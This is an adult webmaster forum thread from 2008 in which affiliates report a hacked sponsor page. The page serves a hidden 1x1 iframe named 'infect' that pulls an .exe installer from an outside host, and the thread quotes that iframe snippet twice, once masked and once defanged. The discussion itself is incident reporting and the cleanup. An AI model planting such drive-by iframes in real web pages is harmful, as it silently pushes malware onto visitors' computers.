GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Who the fuck is ghostcash and who is in charge over there? (https://gfy.com/showthread.php?t=869709)

Number1Thumb 11-17-2008 01:54 AM

Who the fuck is ghostcash and who is in charge over there?
 
Anyone around I can get ahold of? WTF is this shit all about?

<iframe src=http://www.xxxxxxxxxxxxx.com/InstallPlugins.exe frameborder=\"0\" width=\"1\" height=\"1\" scrolling=\"no\" name=\"infect\"></iframe>

These fucks put some shit on my server somehow and want to serve installs?

:321GFY

st0ned 11-17-2008 02:25 AM

That's not good, any idea how it got on there? I promote some Ghost Cash sites...I sure hope they aren't adding spamware on my surfers computers. :disgust

After Shock Media 11-17-2008 02:55 AM

Just how would they put stuff on your servers?
Did you give them the ability to upload?
Or is it that perhaps you been hacked and someone else is fucking your traffic and sending it to them or whatever? What you show above says nothing really, aside from that someone was silly enough to name it "infect".

JamesK 11-17-2008 03:00 AM

I doubt they'd do that on purpose. They probably got hacked.

After Shock Media 11-17-2008 03:03 AM

Quote:

Originally Posted by JamesK (Post 15065521)
I doubt they'd do that on purpose. They probably got hacked.

It says on his server.

JamesK 11-17-2008 03:15 AM

Quote:

Originally Posted by After Shock Media (Post 15065525)
It says on his server.

Yeah I don't understand how it relates to them either. Unless the exe file is hosted on one of GhostCash' sites there's no link to them.

Number1Thumb 11-17-2008 07:29 AM

Go to http://www.trixieswallows.com/main

view source, its right at the top. I got a screen shot as well

Trax 11-17-2008 07:51 AM

Quote:

Originally Posted by Number1Thumb (Post 15065964)
Go to http://www.trixieswallows.com/main

view source, its right at the top. I got a screen shot as well

url 404s

Number1Thumb 11-17-2008 07:52 AM

http://www.trixieswallows.com/main/

still works for me

Barefootsies 11-17-2008 07:54 AM

Super Ghost is in charge.
But I hear he's flying over the city and stopping all the crime at the moment.

Roald 11-17-2008 07:59 AM

Quote:

Originally Posted by Number1Thumb (Post 15066056)

Check the source, seems to be an iframe on that page or something like mentioned by the thread starter.

The .exe goes 404 for me though

Qbert 11-17-2008 08:12 AM

It 404'd the first time I clicked the link, but the second time I got the tour page with the iframe code.

It sure looks like a server hack.

BigSicK 11-17-2008 08:17 AM

its not on all their sites, I just checked creampie thais and it looks clean

brassmonkey 11-17-2008 08:24 AM

yeah ic it

<html>
<body>
<iframe src=hxxp://www.fordstrokers.com/InstallPlugins.exe frameborder=\"0\" width=\"1\" height=\"1\" scrolling=\"no\" name=\"infect\"></iframe>
</body>
</html>

Number1Thumb 11-17-2008 08:43 AM

:321gfy:321gfy:321gfy

shunga 11-17-2008 08:53 AM

Ghostcash are good people. No doubt that's a server hack.

C-Luv 11-17-2008 08:56 AM

A ghost did it, he he he

brassmonkey 11-17-2008 08:57 AM

yeah i had one it was hidden in php code in my site

st0ned 11-17-2008 09:18 AM

Wow, you were right. I can't believe I am seeing a code named infect on a sponsor site. Nobody has been able to contact them yet?

Number1Thumb 11-17-2008 09:23 AM

Quote:

Originally Posted by st0ned (Post 15066411)
Wow, you were right. I can't believe I am seeing a code named infect on a sponsor site. Nobody has been able to contact them yet?

ya tell me about it. So I was hacked, thats a given and they were hacked as well? Hmm I guess :1orglaugh

Number1Thumb 11-17-2008 10:28 AM

:helpme ...............

spacedog 11-17-2008 10:52 AM

that's fucked up..

sicone 11-17-2008 11:10 AM

bump for some answers

Horny Alf 11-17-2008 11:14 AM

Whoa, yea we were hacked last week so thats definitely NOT from us. We have our programmer on this right now.

Don Pueblo 11-17-2008 11:17 AM

i give up.

BradM 11-17-2008 11:18 AM

LOL exploit/hacked code been up for a WEEK? NICE JOB MANAGING YOUR SHIT

CyberHustler 11-17-2008 11:23 AM

Seems like we have a situation here...

Horny Alf 11-17-2008 11:30 AM

we are investigating what appears to be a hack of our system. We value our affiliates and customers and would NEVER consider installing any thing on ANY computer.

Horny Alf 11-17-2008 11:32 AM

Quote:

Originally Posted by BradM (Post 15066883)
LOL exploit/hacked code been up for a WEEK? NICE JOB MANAGING YOUR SHIT

We had a problem with one our other servers last week NOT the main tour server, and NO, we would NOT allow it to go one more than the time it takes to solve it.

Iron Fist 11-17-2008 11:37 AM

Thank god Thainee seems to be clean....

SmokeyTheBear 11-17-2008 11:41 AM

i contacted isprime where the exe was located and they were already removing it from another hacked site. kudos to isprime

Horny Alf 11-17-2008 11:57 AM

Quote:

Originally Posted by sharphead (Post 15066983)
Thank god Thainee seems to be clean....

Yes, this issue was with trixieswallows only. All of our other sites were unaffected. Everything is back to normal now..

Quagmire 11-17-2008 12:18 PM

Thats the same shit I saw on a whole bunch of hacked wordpress blogs back in August/September.

TheAmericanCannibal 11-17-2008 12:28 PM

email Caspar-
I hear he is very friendly

:1orglaugh


All times are GMT -7. The time now is 01:55 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc